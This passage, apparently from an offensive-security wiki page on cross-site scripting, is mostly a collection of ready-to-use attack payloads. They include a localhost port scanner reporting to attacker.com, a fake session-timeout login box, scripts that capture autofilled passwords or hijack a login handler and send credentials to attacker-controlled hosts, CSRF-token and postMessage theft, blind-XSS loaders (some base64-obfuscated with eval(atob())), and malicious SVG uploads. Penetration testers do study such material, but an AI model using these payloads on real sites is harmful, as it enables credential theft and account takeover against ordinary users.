"&code=" +
encodeURIComponent(text) +
"&" +
Date.now()
})
)
.catch((e) => {
if (!String(e).includes("The user aborted a request") && q.length) {
q.shift()()
}
})

setTimeout((x) => {
controller.abort()
if (q.length) {
q.shift()()
}
}, wait)
}
</script>

Port Scanner (fetch)

javascript
const checkPort = (port) => {
  // no-cors: the response is opaque, but a resolved promise still tells the port answered
  fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
    let img = document.createElement("img");
    img.src = `http://attacker.com/ping?port=${port}`;
  });
};
for (let i = 0; i < 1000; i++) {
  checkPort(i);
}

Port Scanner (websockets)

javascript
var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i<ports.length; i++) {
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
}

Short times indicate a responding port. Longer times indicate no response.

Check the list of ports banned in Chrome here and in Firefox here.

Box to ask for credentials

html
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your session has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>

Capturing auto-filled passwords

html
<b>Username:</b><br>
<input name=username id=username>
<b>Password:</b><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

When any data is entered in the password field, the username and password are sent to the attacker's server; even if the client selects a saved password and doesn't type anything, the credentials will be exfiltrated.

Hijack form handlers to exfiltrate credentials (const shadowing)

If a critical handler (e.g., function DoLogin(){...}) is declared later in the page and your payload runs earlier (e.g., via an inline JS-in-JS sink), define a const with the same name first to take over and lock the handler. Later function declarations cannot rebind a const name, leaving your hook in control:

javascript
const DoLogin = () => {
const pwd  = Trim(FormInput.InputPassword.value);
const user = Trim(FormInput.InputUtente.value);
fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));
};

Notes

  • This depends on execution order: your injection must run before the legitimate declaration.
  • If your payload is wrapped inside eval(...), const/let bindings will not be globals. Use the dynamic <script> injection technique from the section "Deliverable payloads with eval(atob()) and scope nuances" to ensure a true global, non-rebindable binding.
  • When keyword filters block the code, combine it with Unicode-escaped identifiers or eval(atob('...')) delivery, as shown above.

Keylogger

Just searching in GitHub I found a few different ones:

Stealing CSRF tokens

javascript
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

Stealing PostMessage messages

html
<img src="https://attacker.com/?" id=message>
<script>
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
}
</script>

Abusing Service Workers

Abusing Service Workers

Accessing Shadow DOM

Shadow DOM

Polyglots

Auto_Wordlists/wordlists/xss_polyglots.txt at main · carlospolop/Auto_Wordlists · GitHub

Blind XSS payloads

You can also use: https://xsshunter.com/

html
"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>

<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>

<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">

<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>

<!-- html5sec -  allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags  -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!--  html5sec - eventhandler -  element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known.  -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>

<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload&#61;&#61; onerror=eval(atob(this.id))>

<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload&#61;&#61; autofocus>

<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

<!-- Payloads from https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide -->
<!-- Image tag -->
'"><img src="x" onerror="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- Input tag with autofocus -->
'"><input autofocus onfocus="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- In case jQuery is loaded, we can make use of the getScript method -->
'"><script>$.getScript("{SERVER}/script.js")</script>

<!-- Make use of the JavaScript protocol (applicable in cases where your input lands into the "href" attribute or a specific DOM sink) -->
javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw=="))

<!-- Render an iframe to validate your injection point and receive a callback -->
'"><iframe src="{SERVER}"></iframe>

<!-- Bypass certain Content Security Policy (CSP) restrictions with a base tag -->
<base href="{SERVER}" />

<!-- Make use of the meta-tag to initiate a redirect -->
<meta http-equiv="refresh" content="0; url={SERVER}" />

<!-- In case your target makes use of AngularJS -->
{{constructor.constructor("import('{SERVER}/script.js')")()}}

Regex - Accessing Hidden Content

From this writeup you can learn that even if some values disappear from JS, it is still possible to find them in JS attributes of different objects. For example, the input of a REGEX can still be found even after the value of the regex input was removed:

javascript
// Do regex with flag
flag = "CTF{FLAG}"
re = /./g
re.test(flag)

// Remove flag value, nobody will be able to get it, right?
flag = ""

// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(
document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
)

Brute-Force List

Auto_Wordlists/wordlists/xss.txt at main · carlospolop/Auto_Wordlists · GitHub

XSS Abusing other vulnerabilities

XSS in Markdown

Can you inject Markdown code that a renderer will display? Maybe you can get XSS! Check:

XSS in Markdown

XSS to SSRF

Got XSS on a site that uses caching? Try upgrading it to SSRF through Edge Side Include Injection with this payload:

html
<esi:include src="http://yoursite.com/capture" />

Use it to bypass cookie restrictions, XSS filters and much more!
More information about this technique here: XSLT.

XSS in dynamically created PDFs

If a web page creates a PDF from user-controlled input, you can try to trick the bot that renders the PDF into executing arbitrary JS code.
So, if the PDF creator bot finds some kind of HTML tags, it is going to interpret them, and you can abuse this behaviour to cause a Server XSS.

Server Side XSS (Dynamic PDF)

If you can't inject HTML tags it could be worth trying to inject PDF data:

PDF Injection

XSS in Amp4Email

AMP, aimed at accelerating web page performance on mobile devices, incorporates HTML tags supplemented by JavaScript to ensure functionality with an emphasis on speed and security. It supports a range of components for various features, accessible via AMP components.

The AMP for Email format extends specific AMP components to emails, enabling recipients to interact with content directly within their emails.

Example writeup XSS in Amp4Email in Gmail.

XSS uploading files (svg)

Upload as an image a file like the following (from http://ghostlulz.com/xss-svg/):

html
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--

html
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>

html
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>

svg
<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>

<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>

html
<svg><use href="//portswigger-labs.net/use_element/upload.php#x" /></svg>

xml
<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' &gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />

Find more SVG payloads in https://github.com/allanlw/svg-cheatsheet

Misc JS Tricks & Relevant Info

Misc JS Tricks & Relevant Info

XSS Resources

References
